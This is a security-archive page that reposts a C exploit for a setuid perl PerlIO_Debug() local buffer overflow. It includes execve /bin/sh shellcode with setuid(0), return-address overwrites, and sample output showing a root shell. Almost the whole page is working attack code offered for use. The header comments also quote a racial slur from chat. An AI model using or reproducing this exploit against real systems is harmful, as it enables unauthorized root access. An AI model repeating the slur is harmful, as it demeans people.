首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Setuid perl 'PerlIO_Debug()' Local buffer overflow Exploit
来源:www.secnetops.com 作者:Kevin 发布时间:2005-02-08  

Setuid perl "PerlIO_Debug()" Local buffer overflow Exploit

/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/

#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int main(int *argc, char **argv)
{
int len = 23;
int count = 5;
char malpath[10000];
char tmp[256];
char *filler;
char *ptr;

unsigned char code[] =
/*
0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>
Linux/IA32 0xff-less execve() shellcode.
*/

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

// setuid(0) - fix for redhat based machines
"\x31\xdb" // xorl %ebx,%ebx
"\x8d\x43\x17" // leal 0x17(%ebx),%eax
"\xcd\x80" // int $0x80

"\x89\xe6" /* movl %esp, %esi */
"\x83\xc6\x30" /* addl $0x30, %esi */
"\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */
"\x40" /* incl %eax */
"\x89\x06" /* movl %eax, (%esi) */
"\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */
"\x40" /* incl %eax */
"\x89\x46\x04" /* movl %eax, 0x04(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */;


chdir("/tmp/");

// do one less char than usual for RedHat
filler =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";

for (int x=0; x<4; x=x+1)
{
mkdir(filler, 0777);
chdir(filler);
// do one less char than usual for RedHat
count = count + 255;
}

memset(tmp,0x41,len);
count = count + len;

ptr = tmp+len;
ptr = putLong (ptr, 0xbffffb6a); // frame 11 ebp
ptr = putLong (ptr, 0xbffffb6a);
ptr = putLong (ptr, 0xbffffb6a);

strcat(tmp, "/");
mkdir(tmp, 0777);
chdir(tmp);

printf ("Dirlen: %d\n", count);

FILE *perlsploit;
char perldummyfile[] = {
"#!/usr/bin/sperl5.8.4\n"
"# \n"
"# Be proud that perl(1) may proclaim: \n"
"# Setuid Perl scripts are safer than C programs
...\n"
"# Do not abandon (deprecate) suidperl. Do not advocate
C wrappers. \n"
};

if(!(perlsploit = fopen("take_me.pl","w+"))) {
printf("error opening file\n");
exit(1);
}
fwrite(perldummyfile,sizeof(perldummyfile)-1,1,perlsploit);
fclose(perlsploit);

getcwd(malpath, 10000);
strcat(malpath, "/");
strcat(malpath, "take_me.pl");
printf("Charlie Murphy!!!@#@\n");

chmod(malpath,0755);
setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1);
setenv("PERL5LIB", code, 1);
execv(malpath,(char *) NULL);

}
/*
* put a address in mem, for little-endian
*
*/
char*
putLong (char* ptr, long value)
{
*ptr++ = (char) (value >> 0) & 0xff;
*ptr++ = (char) (value >> 8) & 0xff;
*ptr++ = (char) (value >> 16) & 0xff;
*ptr++ = (char) (value >> 24) & 0xff;

return ptr;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Setuid perl 'PerlIO_Debug()' A
·Mac OS X 'Finder/DS_Store' Arb
·ngIRCd 'Log_Resolver()' Remote
·3CServer v1.1 FTP Server Remot
·Newspost 'socket_getline()' Re
·AppleFileServer (AFS) 'FPLogin
·Linux ncpfs Local Exploit
·SLX server 6.1 Proof of concep
·Xpand Rally <= 1.0.0.0 serv
·Microsoft Windows Metafile (.e
·HKLM CurrentVersion Locking
·Microsoft IIS WebDAV XML Denia
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved